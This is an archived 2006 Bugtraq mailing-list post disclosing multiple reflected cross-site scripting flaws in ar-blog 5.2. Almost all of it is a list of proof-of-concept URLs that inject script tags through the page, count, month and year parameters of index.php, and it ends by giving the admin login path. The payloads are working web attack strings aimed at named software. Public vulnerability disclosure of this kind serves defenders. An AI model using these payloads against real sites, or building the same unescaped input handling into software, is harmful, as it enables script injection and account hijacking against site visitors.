lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060527110332.27190.qmail@securityfocus.com> Date: 27 May 2006 11:03:32 -0000 From: black-cod3@...mail.com To: bugtraq@...urityfocus.com Subject: Multiple Xss exploits in ar-blog v 5.2 Multiple Xss exploits in ar-blog v 5.2 forum type : ar-blog v 5.2 bug found by : black-code team : site-down type : Xss black-code: http://www.xxx.com/path/index.php?page=gb&count=next='><script>alert(10)</script> http://www.xxx.com/path/index.php?page=gb&count='><script>alert(10)</script> http://www.xxx.com/path/index.php?page=showtopis&month=mo&year=Year_the_news='><script>alert(10)</script> http://www.xxx.com/path/index.php?page=showtopis&month=mo&year='><script>alert(10)</script> http://www.xxx.com/path/index.php?page=showtopis&month=mo='><script>alert(10)</script> http://www.xxx.com/path/index.php?page=showtopis&month='><script>alert(10)</script> path to admin login: http://www.xxx.com/pth/admin All my respect to my friend sweet-devil , lezr.com , g123g.net .. done .. peace